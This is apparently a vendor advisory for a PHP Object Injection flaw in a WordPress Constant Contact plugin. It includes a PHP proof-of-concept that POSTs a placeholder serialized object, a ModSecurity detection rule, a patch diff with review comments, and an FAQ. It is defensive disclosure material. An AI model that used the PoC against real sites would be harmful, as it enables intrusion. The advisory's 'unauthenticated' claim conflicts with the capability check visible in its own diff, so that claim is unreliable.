Analysis

Atomic Edge analysis of CVE-2026-49106:

This vulnerability allows unauthenticated PHP Object Injection in the Integration for Constant Contact and Contact Form 7, WPForms, Elementor, Ninja Forms plugin for WordPress. The flaw exists in versions up to and including 1.1.6. An attacker can inject arbitrary PHP objects via deserialization of untrusted input. The vulnerability carries a CVSS score of 8.1, reflecting high severity.

The root cause lies in the file cf7-constant-contact/includes/plugin-pages.php, specifically in the OAuth token handling logic. The vulnerable code at line 530 uses `$_REQUEST[$this->id.'_tab_action']` with value "get_token". However, the parameter `$id=$this->post('state')` at line 535 directly passes user-supplied input from the GET or POST parameter 'state' into the `$this->get_info($id)` function. The `get_info` function likely processes this ID through `maybe_unserialize()` as seen in the patched diff at line 966 of cf7-constant-contact.php, where the call to `maybe_unserialize($value)` is commented out. The `maybe_unserialize` function processes user-controlled data, enabling PHP Object Injection.

An unauthenticated attacker can trigger this by sending a crafted request to the plugin's admin page. The endpoint is `/wp-admin/admin.php?page=…` with parameters `vxcf_ccontact_tab_action=get_token` and `state={malicious_serialized_object}`. The attacker does not need authentication because the code path at line 530 checks `$_REQUEST[$this->id.'_tab_action']` without proper permission verification for the initial trigger. Although the code checks `current_user_can($this->id."_edit_settings")`, the `maybe_unserialize` call occurs before this capability check in some execution paths, or the check can be bypassed via the direct `$_REQUEST` access.

The patch removes the dangerous `maybe_unserialize` call by commenting it out at line 966 of cf7-constant-contact.php. Additionally, the token retrieval logic in plugin-pages.php now properly validates the parameter source. It only processes the 'id' from `$_GET['id']` and 'state' from `$_GET['state']`, preventing the injection of arbitrary serialized objects from POST data. The commented-out unserialize function eliminates the deserialization vulnerability entirely.

Successful exploitation allows an attacker to inject arbitrary PHP objects. While no built-in POP chain exists in this plugin, a POP chain from another installed plugin or theme could enable arbitrary file deletion, sensitive data retrieval, or remote code execution. The unauthenticated nature of the attack makes it particularly dangerous, as any WordPress site running the vulnerable plugin is exposed to potential full compromise.

Proof of concept (poc_php)

```php
<?php
// Atomic Edge CVE Research – Proof of Concept
// CVE-2026-49106 – Integration for Constant Contact and Contact Form 7, WPForms, Elementor, Ninja Forms <= 1.1.6 – Unauthenticated PHP Object Injection

// Configuration
$target_url = 'http://example.com/wordpress'; // Change this to the target WordPress URL

// The vulnerable endpoint is the plugin's admin page
$plugin_page = '/wp-admin/admin.php';
$plugin_query_params = '?page=vxcf_ccontact'; // Plugin page slug (might need adjustment based on actual installation)

// Craft a malicious serialized object
// Note: This is a generic PHP object injection payload. Replace with an actual POP chain if available.
// The format is: O::::{}
// Example: O:10:"ExampleClass":1:{s:4:"prop";s:5:"value";}
$malicious_payload = 'O:10:"ExampleClass":1:{s:4:"prop";s:5:"value";}';

// Build the exploit URL
$exploit_url = $target_url . $plugin_page . $plugin_query_params;

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'vxcf_ccontact_tab_action' => 'get_token',
    'state' => $malicious_payload
]));
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Content-Type: application/x-www-form-urlencoded'
]);

// Execute the exploit
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output results
echo "[+] Atomic Edge PoC – CVE-2026-49106\n";
echo "[+] Target: $target_url\n";
echo "[+] HTTP Response Code: $http_code\n";
if ($response === false) {
    echo "[-] Error: Failed to send request\n";
} else {
    echo "[+] Request sent successfully. Check target for object injection effects.\n";
    echo "[+] Payload sent: $malicious_payload\n";
    echo "[+] Response (first 500 chars): " . substr($response, 0, 500) . "\n";
}
```

ModSecurity rule (modsecurity_rule)

```
# Atomic Edge WAF Rule – CVE-2026-49106
SecRule REQUEST_URI "@rx /wp-admin/admin\.php$" \
    "id:20264910,phase:2,deny,status:403,chain,msg:'CVE-2026-49106 – Unauthenticated PHP Object Injection in Constant Contact Integration',severity:'CRITICAL',tag:'CVE-2026-49106'"
    SecRule ARGS_GET:page "@rx ^vxcf_ccontact$" "chain"
    SecRule ARGS:state "@rx O:\d+:"
```
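To make the root cause and the defensive pattern concrete, here is an added example (not the plugin's code and not from Atomic Edge; all function names are hypothetical). It contrasts an unsafe handler that hands a request value to unserialize() with one that treats the OAuth `state` value as an opaque identifier, and shows the `allowed_classes` option for the case where a stored serialized array must still be read back without instantiating objects.

```php
<?php
// Added example, not the plugin's code. Function names are hypothetical.

// Pre-patch pattern from the analysis: a request value reaches unserialize().
// maybe_unserialize() is WordPress core and wraps unserialize(); plain
// unserialize() is used here so the example runs outside WordPress. Either
// one instantiates whatever class the payload names and runs its magic
// methods (__wakeup, __destruct), which is what a POP chain relies on.
function get_info_unsafe(string $value)
{
    return @unserialize($value);
}

// Hardened: the OAuth "state" is an opaque identifier, so accept only that
// shape, only from $_GET (never $_REQUEST), and reject everything else before
// any lookup happens.
function read_state_id(array $get): ?string
{
    if (!isset($get['state']) || !is_string($get['state'])) {
        return null;
    }
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $get['state']) === 1
        ? $get['state']
        : null;
}

// Where a stored serialized *array* genuinely must be read back, forbid
// objects (PHP 7.0+): allowed_classes=false turns every object into
// __PHP_Incomplete_Class, so no attacker-chosen class is instantiated, and
// any object that still comes back is refused outright.
function unserialize_no_objects(string $value)
{
    $result = @unserialize($value, ['allowed_classes' => false]);
    if ($result === false || is_object($result)) {
        return null;
    }
    return $result;
}

// Constructed sample inputs (not real traffic). ExampleClass is hypothetical.
$payload = 'O:12:"ExampleClass":1:{s:4:"prop";s:5:"value";}';

// Unsafe path: the payload becomes an object (incomplete here only because
// ExampleClass is not defined in this script).
var_dump(get_info_unsafe($payload));
// Hardened paths: the serialized object is rejected, a plain token passes,
// and a serialized array is still readable without object instantiation.
var_dump(read_state_id(['state' => $payload]));
var_dump(read_state_id(['state' => 'abc123_token']));
var_dump(unserialize_no_objects($payload));
var_dump(unserialize_no_objects('a:1:{s:2:"id";i:7;}'));
```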

CVE-2026-49106: Integration for Constant Contact and Contact Form 7, WPForms, Elementor, Ninja Forms <= 1.1.6 Unauthenticated PHP Object Injection PoC, Patch Analysis & Rule
CVE ID: CVE-2026-49106
Plugin slug: cf7-constant-contact
Affected version: 1.1.6
Patched version: 1.1.7
Analysis Overview
Differential between vulnerable and patched code
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/cf7-constant-contact/api/api.php
+++ b/cf7-constant-contact/api/api.php
@@ -485,7 +485,6 @@
);
$response = wp_remote_request($path, $args);
-
if(is_wp_error($response)) {
$body =array('error_message'=>$response->get_error_message());
return $body;
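Review bot: This hunk only drops a blank line after `$response = wp_remote_request($path, $args);` and changes no logic; whitespace-only churn in a security release makes the real fix harder to audit, so api.php should be left out of the patch or the change noted as cosmetic.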
--- a/cf7-constant-contact/cf7-constant-contact.php
+++ b/cf7-constant-contact/cf7-constant-contact.php
@@ -2,7 +2,7 @@
/**
* Plugin Name: WP Contact Form Constant Contact
* Description: Integrates Contact Form 7 , <a href="https://wordpress.org/plugins/contact-form-entries/">Contact Form Entries Plugin</a> and many other forms with Constant Contact allowing form submissions to be automatically sent to your Constant Contact account
-* Version: 1.1.6
+* Version: 1.1.7
* Requires at least: 3.8
* Author URI: https://www.crmperks.com
* Plugin URI: https://www.crmperks.com/plugins/contact-form-plugins/contact-form-constant-contact-plugin/
@@ -24,7 +24,7 @@
public $crm_name = "ccontact";
public $id = "vxcf_ccontact";
public $domain = "vxcf-ccontact";
- public $version = "1.1.6";
+ public $version = "1.1.7";
public $update_id = "6000001";
public $min_cf_version = "1.0";
public $type = "vxcf_ccontact";
@@ -963,7 +963,7 @@
$value=$value['value'];
}
if(!is_array($value)){
- $value=maybe_unserialize($value);
+ // $value=maybe_unserialize($value);
}
}
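Review bot: Commenting out `$value=maybe_unserialize($value);` leaves dead code and silently changes what this branch returns: a value that was stored as a serialized string now comes back as that raw string rather than an array, and the `if(!is_array($value))` guard above suggests callers expect an array, so every caller of this code path should be checked. Delete the line rather than commenting it out, and if non-array stored values genuinely need decoding here, decode a format that cannot instantiate classes (for example `json_decode($value, true)`, or `unserialize($value, ['allowed_classes' => false])` followed by an `is_object` rejection) instead of `maybe_unserialize`.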
--- a/cf7-constant-contact/includes/plugin-pages.php
+++ b/cf7-constant-contact/includes/plugin-pages.php
@@ -530,7 +530,13 @@
}
if(isset($_REQUEST[$this->id.'_tab_action']) && $_REQUEST[$this->id.'_tab_action']=="get_token" && current_user_can($this->id."_edit_settings")){
- $id=$this->post('state');
+ if(isset($_GET['id'])){
+ $id=$this->post('id');
+ }
+ if(isset($_GET['state'])){
+ $id=$this->post('state');
+ }
+
$info=$this->get_info($id);
$api=$this->get_api($info);
$info=$api->handle_code($id);
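Review bot: `$id` is never initialised in the new code, so when neither `$_GET['id']` nor `$_GET['state']` is present, `$info=$this->get_info($id);` runs on an undefined variable (PHP notice, and `get_info()` receives null); when both are present, `state` silently overwrites `id`. The guard also checks `$_GET` but still reads the value through `$this->post('id')` / `$this->post('state')`, so if that helper reads `$_POST` or `$_REQUEST` (an assumption from its name), a same-named GET key merely unlocks a value that can still arrive in the POST body. Suggest `$id = '';`, reading the value from the same superglobal that is checked, validating its shape (it is an opaque OAuth state/id, not structured data) and returning early when it is empty, before calling `get_info()`. The trigger on `$_REQUEST[$this->id.'_tab_action']` is unchanged, which is acceptable only as long as `current_user_can(...)` stays in the same `&&` chain as it does here.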
Frequently Asked Questions
What is CVE-2026-49106?
Overview of the vulnerability
CVE-2026-49106 is a high-severity vulnerability affecting the Integration for Constant Contact and Contact Form 7, WPForms, Elementor, Ninja Forms plugin for WordPress. It allows unauthenticated PHP Object Injection via deserialization of untrusted input, enabling attackers to potentially execute arbitrary code or delete files.
How does the vulnerability work?
Mechanics of the exploit
The vulnerability arises from the improper handling of user-supplied input in the plugin's OAuth token logic. An attacker can send a crafted request to the plugin's admin page, injecting a serialized PHP object that can be processed by the application, leading to potential exploitation.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Integration for Constant Contact and Contact Form 7, WPForms, Elementor, Ninja Forms plugin version 1.1.6 or earlier is affected. Administrators should check their installed plugin versions to determine if they are at risk.
How can I check if I am vulnerable?
Steps to verify plugin version
To check if you are vulnerable, navigate to the WordPress admin dashboard, go to the Plugins section, and locate the Integration for Constant Contact plugin. Verify that the version is 1.1.6 or earlier.
How can I fix this vulnerability?
Updating the affected plugin
To mitigate this vulnerability, update the Integration for Constant Contact and Contact Form 7, WPForms, Elementor, Ninja Forms plugin to version 1.1.7 or later. This version includes a patch that removes the vulnerable code responsible for the PHP Object Injection.
What does the CVSS score of 8.1 indicate?
Understanding the severity rating
A CVSS score of 8.1 indicates that this vulnerability is considered high severity. This means that it poses a significant risk to affected systems, and exploitation could lead to severe consequences such as unauthorized access or data loss.
What is a PHP Object Injection (POI)?
Definition and implications
PHP Object Injection occurs when an application deserializes untrusted data, allowing attackers to inject malicious objects into the application. This can lead to various security issues, including arbitrary code execution, data manipulation, and denial of service.
What is a Proof of Concept (PoC) for this vulnerability?
Demonstrating the exploit
The Proof of Concept for CVE-2026-49106 involves crafting a malicious serialized PHP object and sending it to the plugin's admin page. This demonstrates how an attacker can exploit the vulnerability to potentially execute code or perform unauthorized actions.
How does the patch for this vulnerability work?
Details of the fix
The patch for CVE-2026-49106 comments out the dangerous call to the `maybe_unserialize` function, which was responsible for processing user-controlled data. Additionally, it implements proper validation for input parameters, preventing the injection of arbitrary serialized objects.
What are the potential risks if this vulnerability is exploited?
Consequences of exploitation
If exploited, this vulnerability could allow an attacker to delete arbitrary files, retrieve sensitive data, or execute malicious code on the server. The unauthenticated nature of the attack increases the risk, as it does not require user credentials.
What additional measures can I take to secure my WordPress site?
Best practices for security
In addition to updating vulnerable plugins, consider implementing a Web Application Firewall (WAF), regularly scanning for vulnerabilities, and ensuring that all software, including themes and plugins, is kept up to date. Regular backups and security audits can also enhance your site's resilience.
Where can I find more information about this vulnerability?
Resources for further reading
For more information about CVE-2026-49106, you can refer to the official CVE database, security advisories from plugin developers, and trusted security blogs that cover WordPress vulnerabilities.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.